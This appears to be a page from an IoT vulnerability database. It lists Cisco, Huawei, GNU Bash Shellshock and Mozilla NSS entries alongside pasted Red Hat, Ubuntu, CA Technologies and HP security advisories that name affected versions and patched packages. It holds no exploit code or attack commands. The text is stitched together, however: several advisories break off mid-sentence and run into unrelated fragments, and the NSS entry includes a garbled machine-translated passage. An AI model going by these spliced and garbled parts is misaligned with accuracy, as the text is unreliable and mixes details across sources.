VARIoT IoT vulnerabilities database
| VAR-201409-0390 | CVE-2014-3360 | Cisco IOS and IOS XE Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco IOS 12.4 and 15.0 through 15.4 and IOS XE 3.1.xS, 3.2.xS, 3.3.xS, 3.4.xS, 3.5.xS, 3.6.xS, and 3.7.xS before 3.7.6S; 3.8.xS, 3.9.xS, and 3.10.xS before 3.10.1S; and 3.11.xS before 3.12S allow remote attackers to cause a denial of service (device reload) via a crafted SIP message, aka Bug ID CSCul46586. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches.
This issue is being tracked by Cisco Bug ID CSCul46586. The following products and versions are affected: Cisco IOS Release 15.0 through 15.4, IOS XE prior to 3.7.6S Release 3.1.xS, Release 3.2.xS, Release 3.3.xS, Release 3.4.xS, Release 3.5.xS, Release 3.6.xS and 3.7.xS, 3.8.xS before 3.10.1S, 3.9.xS and 3.10.xS, 3.11.xS before 3.12S
| VAR-201409-0391 | CVE-2014-3361 | Cisco IOS of ALG Service disruption in modules (DoS) Vulnerabilities |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
The ALG module in Cisco IOS 15.0 through 15.4 does not properly implement SIP over NAT, which allows remote attackers to cause a denial of service (device reload) via multipart SDP IPv4 traffic, aka Bug ID CSCun54071. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. Cisco IOS Software is prone to a denial-of-service vulnerability.
This issue is being tracked by Cisco Bug ID CSCun54071. The vulnerability stems from the fact that the program does not properly handle the translation of IPv4 packets
| VAR-201409-1256 | No CVE | Cross-site request forgery vulnerability for multiple Huawei products |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
FusionManager is a management software for hardware devices, virtualization resources, and applications provided by Huawei. Huawei USG is a firewall series device. A cross-site request forgery vulnerability exists in the FusionManager and the Huawei USG series. This allows remote attackers to construct malicious URIs, entice users to resolve, and perform malicious operations in the target user context. Multiple Huawei products are prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks
| VAR-201409-1156 | CVE-2014-6271 |
GNU Bash shell executes commands in exported functions in environment variables
Related entries in the VARIoT exploits database: VAR-E-201409-0013, VAR-E-201409-0022, VAR-E-201409-0010, VAR-E-201409-0017, VAR-E-201409-0018, VAR-E-201409-0020, VAR-E-201409-0021, VAR-E-201410-0028, VAR-E-201410-0031, VAR-E-201410-0026, VAR-E-201410-0021, VAR-E-201410-0023, VAR-E-201409-0019, VAR-E-201410-0030, VAR-E-201410-0027, VAR-E-201410-0024, VAR-E-201410-0022, VAR-E-201409-0011, VAR-E-201409-0015, VAR-E-201410-0029, VAR-E-201409-0561, VAR-E-201409-0560, VAR-E-201409-0562, VAR-E-201409-0565, VAR-E-201409-0544, VAR-E-201409-0543, VAR-E-201409-0548, VAR-E-201409-0563, VAR-E-201409-0566, VAR-E-201409-0564, VAR-E-201409-0559, VAR-E-201409-0555, VAR-E-201409-0546, VAR-E-201409-0549, VAR-E-201409-0545, VAR-E-201409-0553, VAR-E-201409-0550, VAR-E-201409-0552, VAR-E-201409-0558, VAR-E-201409-0547 |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix. GNU Bash 4.3 and earlier contains a command injection vulnerability that may allow remote code execution.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: bash security update
Advisory ID: RHSA-2014:1293-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1293.html
Issue date: 2014-09-24
CVE Names: CVE-2014-6271
=====================================================================
1. Summary:
Updated bash packages that fix one security issue are now available for Red
Hat Enterprise Linux 5, 6, and 7.
Red Hat Product Security has rated this update as having Critical security
impact. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available from the CVE link in the
References section. 5 server) - i386, ia64, ppc, s390x, x86_64
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
3. Description:
The GNU Bourne Again shell (Bash) is a shell and command language
interpreter compatible with the Bourne shell (sh).
A flaw was found in the way Bash evaluated certain specially crafted
environment variables. An attacker could use this flaw to override or
bypass environment restrictions to execute shell commands. Certain
services and applications allow remote unauthenticated attackers to
provide environment variables, allowing them to exploit this issue.
(CVE-2014-6271)
For additional information on the CVE-2014-6271 flaw, refer to the
Knowledgebase article at https://access.redhat.com/articles/1200223
Red Hat would like to thank Stephane Chazelas for reporting this issue.
All bash users are advised to upgrade to these updated packages, which
contain a backported patch to correct this issue. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):
1141597 - CVE-2014-6271 bash: specially-crafted environment variables can be used to inject shell commands
6. Package List:
Red Hat Enterprise Linux Desktop (v. 5 client):
Source:
bash-3.2-33.el5.1.src.rpm
i386:
bash-3.2-33.el5.1.i386.rpm
bash-debuginfo-3.2-33.el5.1.i386.rpm
x86_64:
bash-3.2-33.el5.1.x86_64.rpm
bash-debuginfo-3.2-33.el5.1.x86_64.rpm
Red Hat Enterprise Linux (v. 5 server):
Source:
bash-3.2-33.el5.1.src.rpm
i386:
bash-3.2-33.el5.1.i386.rpm
bash-debuginfo-3.2-33.el5.1.i386.rpm
ia64:
bash-3.2-33.el5.1.i386.rpm
bash-3.2-33.el5.1.ia64.rpm
bash-debuginfo-3.2-33.el5.1.i386.rpm
bash-debuginfo-3.2-33.el5.1.ia64.rpm
ppc:
bash-3.2-33.el5.1.ppc.rpm
bash-debuginfo-3.2-33.el5.1.ppc.rpm
s390x:
bash-3.2-33.el5.1.s390x.rpm
bash-debuginfo-3.2-33.el5.1.s390x.rpm
x86_64:
bash-3.2-33.el5.1.x86_64.rpm
bash-debuginfo-3.2-33.el5.1.x86_64.rpm
Red Hat Enterprise Linux Desktop (v. 6):
Source:
bash-4.1.2-15.el6_5.1.src.rpm
i386:
bash-4.1.2-15.el6_5.1.i686.rpm
bash-debuginfo-4.1.2-15.el6_5.1.i686.rpm
x86_64:
bash-4.1.2-15.el6_5.1.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_5.1.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source:
bash-4.1.2-15.el6_5.1.src.rpm
i386:
bash-debuginfo-4.1.2-15.el6_5.1.i686.rpm
bash-doc-4.1.2-15.el6_5.1.i686.rpm
x86_64:
bash-debuginfo-4.1.2-15.el6_5.1.x86_64.rpm
bash-doc-4.1.2-15.el6_5.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
bash-4.1.2-15.el6_5.1.src.rpm
x86_64:
bash-4.1.2-15.el6_5.1.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_5.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source:
bash-4.1.2-15.el6_5.1.src.rpm
x86_64:
bash-debuginfo-4.1.2-15.el6_5.1.x86_64.rpm
bash-doc-4.1.2-15.el6_5.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
bash-4.1.2-15.el6_5.1.src.rpm
i386:
bash-4.1.2-15.el6_5.1.i686.rpm
bash-debuginfo-4.1.2-15.el6_5.1.i686.rpm
ppc64:
bash-4.1.2-15.el6_5.1.ppc64.rpm
bash-debuginfo-4.1.2-15.el6_5.1.ppc64.rpm
s390x:
bash-4.1.2-15.el6_5.1.s390x.rpm
bash-debuginfo-4.1.2-15.el6_5.1.s390x.rpm
x86_64:
bash-4.1.2-15.el6_5.1.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_5.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source:
bash-4.1.2-15.el6_5.1.src.rpm
i386:
bash-debuginfo-4.1.2-15.el6_5.1.i686.rpm
bash-doc-4.1.2-15.el6_5.1.i686.rpm
ppc64:
bash-debuginfo-4.1.2-15.el6_5.1.ppc64.rpm
bash-doc-4.1.2-15.el6_5.1.ppc64.rpm
s390x:
bash-debuginfo-4.1.2-15.el6_5.1.s390x.rpm
bash-doc-4.1.2-15.el6_5.1.s390x.rpm
x86_64:
bash-debuginfo-4.1.2-15.el6_5.1.x86_64.rpm
bash-doc-4.1.2-15.el6_5.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
bash-4.1.2-15.el6_5.1.src.rpm
i386:
bash-4.1.2-15.el6_5.1.i686.rpm
bash-debuginfo-4.1.2-15.el6_5.1.i686.rpm
x86_64:
bash-4.1.2-15.el6_5.1.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_5.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source:
bash-4.1.2-15.el6_5.1.src.rpm
i386:
bash-debuginfo-4.1.2-15.el6_5.1.i686.rpm
bash-doc-4.1.2-15.el6_5.1.i686.rpm
x86_64:
bash-debuginfo-4.1.2-15.el6_5.1.x86_64.rpm
bash-doc-4.1.2-15.el6_5.1.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source:
bash-4.2.45-5.el7_0.2.src.rpm
x86_64:
bash-4.2.45-5.el7_0.2.x86_64.rpm
bash-debuginfo-4.2.45-5.el7_0.2.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
bash-debuginfo-4.2.45-5.el7_0.2.x86_64.rpm
bash-doc-4.2.45-5.el7_0.2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
bash-4.2.45-5.el7_0.2.src.rpm
x86_64:
bash-4.2.45-5.el7_0.2.x86_64.rpm
bash-debuginfo-4.2.45-5.el7_0.2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
bash-debuginfo-4.2.45-5.el7_0.2.x86_64.rpm
bash-doc-4.2.45-5.el7_0.2.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
bash-4.2.45-5.el7_0.2.src.rpm
ppc64:
bash-4.2.45-5.el7_0.2.ppc64.rpm
bash-debuginfo-4.2.45-5.el7_0.2.ppc64.rpm
s390x:
bash-4.2.45-5.el7_0.2.s390x.rpm
bash-debuginfo-4.2.45-5.el7_0.2.s390x.rpm
x86_64:
bash-4.2.45-5.el7_0.2.x86_64.rpm
bash-debuginfo-4.2.45-5.el7_0.2.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64:
bash-debuginfo-4.2.45-5.el7_0.2.ppc64.rpm
bash-doc-4.2.45-5.el7_0.2.ppc64.rpm
s390x:
bash-debuginfo-4.2.45-5.el7_0.2.s390x.rpm
bash-doc-4.2.45-5.el7_0.2.s390x.rpm
x86_64:
bash-debuginfo-4.2.45-5.el7_0.2.x86_64.rpm
bash-doc-4.2.45-5.el7_0.2.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
bash-4.2.45-5.el7_0.2.src.rpm
x86_64:
bash-4.2.45-5.el7_0.2.x86_64.rpm
bash-debuginfo-4.2.45-5.el7_0.2.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-6271.html
https://access.redhat.com/security/updates/classification/#critical
https://access.redhat.com/articles/1200223
8. 6.4) - i386, ppc64, s390x, x86_64
3. ============================================================================
Ubuntu Security Notice USN-2362-1
September 24, 2014
bash vulnerability
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Bash allowed bypassing environment restrictions in certain environments.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.04 LTS:
bash 4.3-7ubuntu1.1
Ubuntu 12.04 LTS:
bash 4.2-2ubuntu2.2
Ubuntu 10.04 LTS:
bash 4.1-2ubuntu3.1
In general, a standard system update will make all the necessary changes.
-----BEGIN PGP SIGNED MESSAGE-----
CA20141001-01: Security Notice for Bash Shellshock Vulnerability
Issued: October 01, 2014
Updated: October 03, 2014
CA Technologies is investigating multiple GNU Bash vulnerabilities,
referred to as the "Shellshock" vulnerabilities, which were publicly
disclosed on September 24-27, 2014. CVE identifiers CVE-2014-6271,
CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and
CVE-2014-6278 have been assigned to these vulnerabilities.
The CA Technologies Enterprise Information Security team has led a
global effort to identify and remediate systems and products discovered
with these vulnerabilities. We continue to patch our systems as fixes
become available, and we are providing fixes for affected CA
Technologies products.
CA Technologies continues to aggressively scan our environments
(including servers, networks, external facing applications, and SaaS
environments) to proactively monitor, identify, and remediate any
vulnerability when necessary.
Risk Rating
High
Platform
AIX
Android (not vulnerable, unless rooted)
Apple iOS (not vulnerable unless jailbroken)
Linux
Mac OS X
Solaris
Windows (not vulnerable unless Cygwin or similar ported Linux tools
with Bash shell are installed)
Other UNIX/BSD based systems if Bash is installed
Any other OS or JeOS that utilizes Bash
Affected Products
The following products have been identified as potentially vulnerable,
and we have made fixes available for all of these products.
CA API Management (Linux appliance only)
CA Application Performance Management (TIM is the only affected APM
component)
CA Application Performance Management Cloud Monitor
CA Customer Experience Manager (CEM) Transaction Impact Monitor (TIM)
CA Layer 7 products (API Gateway, Mobile Access Gateway, API Management
Portal)
CA User Activity Reporting Module (Enterprise Log Manager)
Note: This security notice will be updated if other CA Technologies
products are determined to be vulnerable.
In most cases, the Bash vulnerabilities will need to be patched by OS
vendors. Exceptions may include CA Technologies appliances, and
software products that include Linux, UNIX or Mac OS X based operating
systems (that include Bash).
Affected Components
CentOS
Cygwin
GNU Bash
Red Hat Enterprise Linux
SUSE Linux
Non-Affected Products
IMPORTANT NOTE: This listing includes only a small subset of the
unaffected CA Technologies products. We're including unaffected
products that customers have already inquired about. While the
following CA Technologies products are not directly affected by the
Bash vulnerabilities, the underlying operating systems that CA
Technologies software is installed on may be vulnerable. We strongly
encourage our customers to follow the recommendations provided by their
vendors for all operating systems they utilize.
All CA SaaS / On Demand products were either not vulnerable or have
already been patched.
CA AHS / PaymentMinder - AHS App is not vulnerable. The AHS app does
not execute CGI scripts, or spawn or execute shell commands from within
the app. AHS infrastructure already patched.
CA Asset Portfolio Management
CA AuthMinder (Arcot WebFort)
CA AuthMinder for Business Users
CA AuthMinder for Consumers
CA AutoSys products - We use the bash shell that comes with the
operating system and the customer is responsible for patching their OS.
Additionally, the agents themselves do not distribute any scripts that
use bash.
CA Clarity On Demand
CA CloudMinder - CloudMinder does not include the Bash Shell in BoM, or
use it, but because we are deployed on RHEL, customers may be
indirectly affected. Customers using RHEL should apply patches provided
by Red Hat.
CA Console Management for OpenVMS - Our OpenVMS products do not bundle
bash, and they do not supply bash scripts; we use nothing but the
native DCL CLI.
CA ControlMinder
CA DataMinder (formerly DLP) products – Software and appliance
confirmed not vulnerable. Note: Linux Agents shipped, but no public SSH
or Web apps are used in these agents. Customers should patch bash shell
on any Linux server with DataMinder agents. DataMinder agents should
continue to function normally.
CA Digital Payments SaaS (previously patched)
CA Directory
CA eCommerce SaaS / On Demand (previously patched)
CA Endevor Software Change Manager
CA Federation (formerly SiteMinder Federation)
CA GovernanceMinder
CA IdentityMinder
CA Infrastructure Management
CA JCLCheck
CA Job Management for OpenVMS - Our OpenVMS products do not bundle
bash, and they do not supply bash scripts; we use nothing but the
native DCL CLI.
CA NetQoS GigaStor Observer Expert
CA Network Flow Analysis
CA Performance Management for OpenVMS - Our OpenVMS products do not
bundle bash, and they do not supply bash scripts; we use nothing but
the native DCL CLI.
CA RiskMinder
CA Service Desk Manager
CA Service Operations Insight (SOI)
CA SiteMinder
CA SOLVE:Access
CA Spectrum for Linux - Not vulnerable. Be sure to apply bash fixes
from your underlying operating system vendor.
CA Strong Authentication
CA System Watchdog for OpenVMS - Our OpenVMS products do not bundle
bash, and they do not supply bash scripts; we use nothing but the
native DCL CLI.
CA Top Secret
CA Universal Job Management Agent for OpenVMS - Our OpenVMS products do
not bundle bash, and they do not supply bash scripts; we use nothing
but the native DCL CLI.
CA Virtual Assurance for Infrastructure Managers (VAIM)
Solution
CA Technologies has issued the following fixes to address the
vulnerabilities.
CA API Management:
Patches for Linux appliance are available through CA Support to
customers of Gateway (applicable for all versions – 6.1.5, 6.2, 7.0,
7.1, 8.0, 8.1, 8.1.1, 8.1.02).
CA Application Performance Management:
KB article for APM TIM has been published. APM TIM is the only part of
APM that was affected. Refer to TEC618037.
CA Application Performance Management Cloud Monitor:
New images are available for subscribers. Download the latest OPMS
version 8.2.1.5. For assistance, contact CA Support.
CA Customer Experience Manager (CEM) Transaction Impact Monitor (TIM):
Very low risk. 9.6 is not affected. 9.5 Installation uses Bash. We do
not use Bash at all for the CEM operating system that we have shipped
in the past. This means that customers who patch the OS will not impact
the ability of the CEM TIMsoft from operating. However prior to version
9.6, the TIM installation script does use the bash shell. See new KB
article TEC618037 for additional information.
CA Layer 7 (API Gateway, Mobile Access Gateway, API Management Portal):
Fixes for all Bash vulnerabilities and a security bulletin are available
on the Layer 7 Support website.
CA User Activity Reporting Module (Enterprise Log Manager):
All 12.5 and 12.6 GA versions are potentially affected. Patches
provided on 2014-09-30. To get the patch, use the OS update
functionality to get the latest R12.6 SP1 subscription update. Note
that you can update R12.5 SPx with the R12.6 SP1 OS update. For
assistance, contact CA Support.
Workaround
None
To help mitigate the risk, we do strongly encourage all customers to
follow patch management best practices, and in particular for operating
systems affected by the Bash Shellshock vulnerabilities.
References
CVE-2014-6271 - Bash environment variable command injection
CVE-2014-7169 - Bash environment variable incomplete fix for CVE-2014-6271
CVE-2014-7186 - Bash parser redir_stack memory corruption
CVE-2014-7187 - Bash nested flow control constructs off-by-one
CVE-2014-6277 - Bash untrusted pointer use uninitialized memory
CVE-2014-6278 - Bash environment variable command injection
CA20141001-01: Security Notice for Bash Shellshock Vulnerability
https://support.ca.com/irj/portal/anonymous/phpsbpldgpg
Change History
v1.0: 2014-10-01, Initial Release
v1.1: 2014-10-02, Added AuthMinder, Strong Authentication, VAIM,
Clarity OD, All SaaS/OD products to list of Non-Affected Products.
v1.2: 2014-10-03, Added RiskMinder to Non-Affected Products. Updated
UARM solution info.
If additional information is required, please contact CA Technologies
Support at https://support.ca.com.
If you discover a vulnerability in CA Technologies products, please
report your findings to the CA Technologies Product Vulnerability
Response Team at vuln@ca.com.
PGP key:
support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782
Security Notices
https://support.ca.com/irj/portal/anonymous/phpsbpldgpg
Regards,
Ken Williams
Director, Product Vulnerability Response Team
CA Technologies | One CA Plaza | Islandia, NY 11749 | www.ca.com
Ken.Williams@ca.com | vuln@ca.com
Copyright © 2014 CA. All Rights Reserved. One CA Plaza, Islandia, N.Y.
11749. All other trademarks, trade names, service marks, and logos
referenced herein belong to their respective companies.
-----BEGIN PGP SIGNATURE-----
Version: Encryption Desktop 10.3.2 (Build 15238)
Charset: utf-8
wsBVAwUBVDK+PZI1FvIeMomJAQFl/Af/TqrSE/h4r3gs9PwrWKdt21PCRI3za9Lx
M5ZyTdVDIQ9ybgPkLqsovNRPgVqd7zwDHsx0rzvF5Y82uO+vQ63BuEV2GnczAax/
EiAW4WVxUgWG+lAowGV55Of8ruv/gOiAWTjFhkqpsyVg96ZMw2HLG62IwZL1j0qa
oLCu0y3VrGvqH0g2hi75QwHAjNCdlEsD4onUqTCc9cRTdLwFCZrUQ8KTrqIL7LK5
Uo5T9C1UeAyNTo3KiJ/zw3BCOTkpl99dmg3NW0onU/1r1CXdlyS7opLB+GJ+xGwP
xRQdUsOIhzfRzx7bsao2D43IhDnzJBBFJHdeMPo18WBTfJ7aUgBwGQ==
=B62b
-----END PGP SIGNATURE-----
. No other firmware
stream updates are planned beyond the NX-OS 5.x and 6.x versions listed below
for the MDS products. This software versions 6.2(9a) has included the
fixes for the vulnerability in HP StoreFabric C-series MDS switches which
currently supporting NX-OS 6.X releases. This software version 5.2(8e) has included the fix
for the vulnerability in HP C-series MDS switches which currently supporting
NX-OS 5.X releases. This bulletin will be revised
when these updates become available.
MITIGATION INFORMATION
If updating to a NX-OS version containing the fix is not currently possible,
HP recommends the following steps to reduce the risk of this vulnerability:
The "ssh" or "telnet" features may be disabled by the admin user. All MDS and
Nexus 5K switches can function in this configuration. Access is available
through the console port.
HISTORY
Version:1 (rev.1) - 6 November 2014 Initial release
Version:2 (rev.2) - 8 December 2014 Updated with MDS releases
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Release Date: 2014-12-16
Last Updated: 2014-12-16
Potential Security Impact: Remote code execution
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Vertica.
References:
CVE-2014-6271
CVE-2014-6277
CVE-2014-6278
CVE-2014-7169
CVE-2014-7186
CVE-2014-7187
SSRT101827
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Vertica AMI's and Virtual Machines prior to v7.1.1-0.
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2104-6277 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2104-6278 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-7186 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-7187 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
We recommend installing Vertica v7.1.1-0 or subsequent, or manually
installing a new version of Bash, such as Bash43-027.
HP has released the following updates to resolve this vulnerability for HP
Vertica products.
Update to the latest VM image available at: https://my.vertica.com
For customers using the AMI version HP Vertica Analytics platform, please
install the latest image available at Amazon.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being
communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins
via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG
&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
- check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
- verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile
to update appropriate sections.
To review previously published Security Bulletins visit:
http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin relates to is
represented by the 5th and 6th characters of the Bulletin number in the
title: GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to
maintain system integrity. HP is continually reviewing and enhancing the
security features of software products to provide customers with current
secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the
attention of users of the affected HP products the important security
information contained in this Bulletin. HP recommends that all users
determine the applicability of this information to their individual
situations and take appropriate action. HP does not warrant that this
information is necessarily accurate or complete for all user situations and,
consequently, HP will not be responsible for any damages resulting from
user's use or disregard of the information provided in this Bulletin. To the
extent permitted by law, HP disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose, title and non-infringement."
Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for incidental,
special or consequential damages including downtime cost; lost profits;
damages relating to the procurement of substitute products or services; or
damages for loss of data, or software restoration. The information in this
document is subject to change without notice.
For the stable distribution (wheezy), this problem has been fixed in
version 4.2+dfsg-0.1+deb7u1
| VAR-201409-0340 | CVE-2014-1568 | Mozilla Network Security Services (NSS) fails to properly verify RSA signatures |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Mozilla Network Security Services (NSS) before 3.16.2.1, 3.16.x before 3.16.5, and 3.17.x before 3.17.1, as used in Mozilla Firefox before 32.0.3, Mozilla Firefox ESR 24.x before 24.8.1 and 31.x before 31.1.1, Mozilla Thunderbird before 24.8.1 and 31.x before 31.1.2, Mozilla SeaMonkey before 2.29.1, Google Chrome before 37.0.2062.124 on Windows and OS X, and Google Chrome OS before 37.0.2062.120, does not properly parse ASN.1 values in X.509 certificates, which makes it easier for remote attackers to spoof RSA signatures via a crafted certificate, aka a "signature malleability" issue. This vulnerability may allow an attacker to forge a RSA signature, such as a SSL certificate. Mozilla Network Security Services (NSS) The library contains DigestInfo There is a problem with the processing of RSA A vulnerability exists that does not properly verify signatures. Mozilla Network Security Services (NSS) Implemented by the library DigestInfo There is a vulnerability in the processing of. BER Encoded DigestInfo When parsing a field, the parsing of padded bytes is bypassed, PKCS#1 v1.5 Formal RSA Signature forgery may not be detected (CWE-295) . CWE-295: Improper Certificate Validation http://cwe.mitre.org/data/definitions/295.html This vulnerability 2006 Announced in the year Bleichenbacher vulnerability It is a kind of. Bleichenbacher vulnerability http://www.imc.org/ietf-openpgp/mail-archive/msg06063.html Mozilla NSS Is plural Linux Distributions and packages, and Google Chrome And Google Chrome OS It is used in etc. Other vulnerable libraries and products may have similar vulnerable implementations.SSL Certificate etc. RSA The signature may be forged.
An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks. The vulnerability is caused by the program not correctly parsing ASN.1 values in X.509 certificates. ============================================================================
Ubuntu Security Notice USN-2360-2
September 24, 2014
thunderbird vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Fraudulent security certificates could allow sensitive information to
be exposed when accessing the Internet. This update provides the
corresponding updates for Thunderbird.
Original advisory details:
Antoine Delignat-Lavaud and others discovered that NSS incorrectly handled
parsing ASN.1 values.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.04 LTS:
thunderbird 1:31.1.2+build1-0ubuntu0.14.04.1
Ubuntu 12.04 LTS:
thunderbird 1:31.1.2+build1-0ubuntu0.12.04.1
After a standard system update you need to restart Thunderbird to make
all the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: rhev-hypervisor6 security update
Advisory ID: RHSA-2014:1354-01
Product: Red Hat Enterprise Virtualization
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1354.html
Issue date: 2014-10-02
CVE Names: CVE-2014-1568 CVE-2014-6271 CVE-2014-7169
CVE-2014-7186 CVE-2014-7187
=====================================================================
1. Summary:
An updated rhev-hypervisor6 package that fixes several security issues is
now available.
Red Hat Product Security has rated this update as having Critical security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
RHEV-M 3.4 - noarch
3. Description:
The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization
Hypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor
is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes
everything necessary to run and manage virtual machines: a subset of the
Red Hat Enterprise Linux operating environment and the Red Hat Enterprise
Virtualization Agent.
Note: Red Hat Enterprise Virtualization Hypervisor is only available for
the Intel 64 and AMD64 architectures with virtualization extensions.
A flaw was found in the way Bash evaluated certain specially crafted
environment variables. An attacker could use this flaw to override or
